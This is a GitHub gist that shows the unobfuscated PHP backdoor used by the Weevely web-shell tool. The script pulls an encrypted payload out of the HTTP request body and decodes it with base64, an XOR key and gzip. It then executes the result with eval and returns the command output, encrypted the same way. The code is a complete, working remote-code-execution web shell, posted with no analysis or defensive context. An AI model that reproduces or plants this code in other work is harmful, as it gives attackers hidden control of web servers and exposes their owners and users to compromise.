Skip to content

Instantly share code, notes, and snippets.

@niloct
Created February 14, 2020 02:13
Show Gist options
  • Save niloct/9066ecd54bac4a8cecdb08917d6a2d36 to your computer and use it in GitHub Desktop.
Save niloct/9066ecd54bac4a8cecdb08917d6a2d36 to your computer and use it in GitHub Desktop.
Weevely's backdoor PHP code, unobfuscated
<?php
$k="97bf34d3";$kh="1a8710e6b164";$kf="9fd33357f783";$p="5ZGtAGceuaFv00jx";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0; $i<$l; ){
for($j=0; ($j<$c && $i<$l); $j++,$i++)
{
$o .= $t{$i}^$k{$j};
}
}
return $o;
}
if (preg_match("/$kh(.+)$kf/",file_get_contents("php://input"),$m)==1) {
ob_start();
eval(gzuncompress(x(base64_decode($m[1]),$k)));
$o=ob_get_contents();
ob_end_clean();
$r=base64_encode(x(gzcompress($o),$k));
print("$p$kh$r$kf");
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment